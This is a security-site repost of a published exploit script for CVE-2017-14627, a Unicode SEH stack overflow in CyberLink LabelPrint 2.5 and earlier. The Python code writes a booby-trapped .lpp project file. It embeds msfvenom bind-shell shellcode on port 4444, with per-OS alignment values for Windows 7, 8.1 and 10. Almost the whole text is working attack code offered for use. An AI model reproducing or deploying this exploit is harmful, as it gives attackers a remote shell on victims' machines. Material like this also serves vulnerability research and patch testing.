首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CyberLink LabelPrint < 2.5 - Buffer Overflow (SEH Unicode)
来源:research[at]spentera.id 作者:f3ci 发布时间:2017-09-26  

#!/usr/bin/python
# Exploit Title: CyberLink LabelPrint <=2.5 File Project Processing Unicode Stack Overflow
# Date: September 23, 2017
# Exploit Author: f3ci
# Vendor Homepage: https://www.cyberlink.com/
# Software Link: http://update.cyberlink.com/Retail/Power2Go/DL/TR170323-021/CyberLink_Power2Go_Downloader.exe
# Version: 2.5
# Tested on: Windows 7x86, Windows8.1x64, Windows 10
# CVE : CVE-2017-14627
#
# Note: Cyberlink LabelPrint is bundled with Power2Go application and also included in most HP, Lenovo, and Asus laptops.
# this proof of concept is based on the LabelPrint 2.5 that comes with Power2Go installation.

def exp():
    header = ("\x3c\x50\x52\x4f\x4a\x45\x43\x54\x20\x76\x65\x72\x73\x69\x6f\x6e"
    "\x3d\x22\x31\x2e\x30\x2e\x30\x30\x22\x3e\x0a\x09\x3c\x49\x4e\x46"
    "\x4f\x52\x4d\x41\x54\x49\x4f\x4e\x20\x74\x69\x74\x6c\x65\x3d\x22"
    "\x22\x20\x61\x75\x74\x68\x6f\x72\x3d\x22\x22\x20\x64\x61\x74\x65"
    "\x3d\x22\x37\x2f\x32\x34\x2f\x32\x30\x31\x37\x22\x20\x53\x79\x73"
    "\x74\x65\x6d\x54\x69\x6d\x65\x3d\x22\x32\x34\x2f\x30\x37\x2f\x32"
    "\x30\x31\x37\x22\x3e")
    filename2 = "labelprint_poc_universal.lpp"
    f = open(filename2,'w')
    junk = "A" * 790
    nseh = "\x61\x42"
    seh = "\x2c\x44"
    nop = "\x42"
 
    #msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/unicode_mixed BufferRegister=EAX -f python
    buf = ""
    buf += "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQ"
    buf += "AIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA"
    buf += "ZBABABABABkMAGB9u4JBkL7x52KPYpM0aPqyHeMa5pbDtKNpNPBk"
    buf += "QBjlTKaBkd4KD2mXzo87pJlfNQ9ovLOLs1cLIrnLMPGQfoZmyqI7"
    buf += "GrZRobnwRk1Bn0bknjOLDKPLkaQhGsNhzawaOa4KaIO0M1XSbka9"
    buf += "lXISmja9Rkp4TKM1FvMaYofLfaXOjmYqUw08wp0uJVJcqmYhmk3M"
    buf += "o4rUk41HTK28NDjaFsrFRklLPK4KaHklzaICTKytbkM1VpSYa4nD"
    buf += "NDOkaKaQ291JoaIoWpqOaOQJtKN2HkTMOmOxOCOBIpm0C8CGT3oB"
    buf += "OopTC80L2WNFzgyoz5Txf0ZaYpm0kyfdB4np38kycPpkypIoiEPj"
    buf += "kXqInp8bKMmpr010pPC8YZjoiOK0yohU67PhLBypjq1L3YzF1ZLP"
    buf += "aFaGPh7R9KoGBGKO8U271XEg8iOHIoiohUaGrH3DJLOK7qIo9EPW"
    buf += "eG1XBU0nnmc1YoYEC81SrMs4ip4IyS27ogaGnQjVaZn2B9b6jBkM"
    buf += "S6I7oTMTMliqkQ2m14nDN0UvKPndb4r0of1FNv0Fr6nn0VR6B31F"
    buf += "BH49FlmoTFyoIEbi9P0NPVq6YolpaXjhsWmMc0YoVuGKHpEe3rnv"
    buf += "QXVFce5mcmkOiEMlKV1lLJ3Pyk9PT5m5GKoWZsSBRO2JypPSYoxUAA"
   

    #preparing address for decoding
    ven = nop               #nop/inc edx
    ven += "\x54"           #push esp
    ven += nop              #nop/inc edx
    ven += "\x58"           #pop eax
    ven += nop              #nop/inc edx
    ven += "\x05\x1B\x01"   #add eax 01001B00 universal
    ven += nop              #nop/inc edx
    ven += "\x2d\x01\x01"   #sub eax 01001000
    ven += nop              #nop/inc edx
    ven += "\x50"           #push eax
    ven += nop              #nop/inc edx
    ven += "\x5c"           #pop esp

    #we need to encode the RET address, since C3 is bad char.
    #preparing ret opcode
    ven += nop              #nop/inc edx
    ven += "\x25\x7e\x7e"   #and eax,7e007e00
    ven += nop              #nop/inc edx
    ven += "\x25\x01\x01"   #and eax,01000100
    ven += nop              #nop/inc edx
    ven += "\x35\x7f\x7f"   #xor eax,7f007f00
    ven += nop              #nop/inc edx
    ven += "\x05\x44\x44"   #add eax,44004400
    ven += nop              #nop/inc edx
    ven += "\x57"           #push edi
    ven += nop              #nop/inc edx
    ven += "\x50"           #push eax
    ven += junk2            #depending OS
  
    #custom venetian
    ven += "\x58"           #pop eax
    ven += nop              #nop/inc edx
    ven += "\x58"           #pop eax
    ven += nop              #nop/inc edx
    ven += align            #depending OS
    ven += nop              #nop/inc edx
    ven += "\x2d\x01\x01"   #add eax, 01000100 #align eax to our buffer
    ven += nop              #nop/inc edx
    ven += "\x50"           #push eax
    ven += nop              #nop/inc edx
 
    #call esp 0x7c32537b MFC71U.dll
    ven += "\x5C"           #pop esp
    ven += nop              #nop/inc edx
    ven += "\x58"           #pop eax
    ven += nop              #nop/inc edx
    ven += "\x05\x53\x7c"   #add eax 7c005300 part of call esp
    ven += nop              #nop/inc edx
    ven += "\x50"           #push eax
    ven += junk1            #depending OS
    ven += "\x7b\x32"       #part of call esp
 
    #preparing for shellcode
    ven += nop * 114        #junk
    ven += "\x57"           #push edi
    ven += nop              #nop/inc edx
    ven += "\x58"           #pop eax
    ven += nop              #nop/inc edx
    ven += align2           #depending OS
    ven += nop              #nop/inc edx
    ven += "\x2d\x01\x01"   #sub eax,01000100
    ven += nop              #nop/inc edx
    ven += buf              #shellcode

    sisa =  nop * (15000-len(junk+nseh+seh+ven))
    payload = junk+nseh+seh+ven+sisa
    bug="\x09\x09\x3c\x54\x52\x41\x43\x4b\x20\x6e\x61\x6d\x65\x3d"+'"'+payload+'"'+"/>\n"
    bug+=("\x09\x3c\x2f\x49\x4e\x46\x4f\x52\x4d\x41\x54\x49\x4f\x4e\x3e\x0a"
    "\x3c\x2f\x50\x52\x4f\x4a\x45\x43\x54\x3e")
    f.write(header+ "\n" + bug)

    print "[+] File", filename2, "successfully created!"
    print "[*] Now open project file", filename2, "with CyberLink LabelPrint."
    print "[*] Good luck ;)"
    f.close()
 
print "[*] <--CyberLink LabelPrint <=2.5 Stack Overflow POC-->"
print "[*] by f3ci & modpr0be <research[at]spentera.id>"
print "[*] <------------------------------------------------->\n"
print "\t1.Windows 7 x86 bindshell on port 4444"
print "\t2.Windows 8.1 x64 bindshell on port 4444"
print "\t3.Windows 10 x64 bindshell on port 4444\n"
input = input("Choose Target OS : ")
try:
    if input == 1:
            align   = "\x05\x09\x01"    #add eax,01000400
            align2  = "\x05\x0A\x01"    #add eax, 01000900
            junk1   = '\x42' * 68       #junk for win7x86
            junk2   = '\x42' * 893      #junk for win7x86
            exp()
    elif input == 2:
            align   = "\x05\x09\x01"    #add eax,01000400
            align2  = "\x05\x0A\x01"    #add eax, 01000900
            junk1   = '\x42' * 116      #junk for win8.1x64
            junk2   = '\x42' * 845      #junk for win8.1x64
            exp()
    elif input == 3:
            align   = "\x05\x05\x01"    #add eax,01000400
            align2  = "\x05\x06\x01"    #add eax, 01000900
            junk1   = '\x42' * 136      #junk for win10x64
            junk2   = '\x42' * 313      #junk for win10x64
            exp()   
    else:
            print "Choose the right one :)"
except:
    print ""


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Cash Back Comparison Script 1.
·Disk Pulse Enterprise 10.0.12
·DenyAll WAF < 6.3.0 - Remote C
·Supervisor 3.0a1 - 3.3.2 - XML
·Stock Photo Selling 1.0 - SQL
·Oracle 9i XDB 9.2.0.1 - HTTP P
·Microsoft Edge Chakra - 'Javas
·FLIR Systems FLIR Thermal Came
·Microsoft Edge Chakra - 'Parse
·FLIR Systems FLIR Thermal Came
·Microsoft Edge Chakra - Deferr
·NodeJS Debugger Command Inject
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved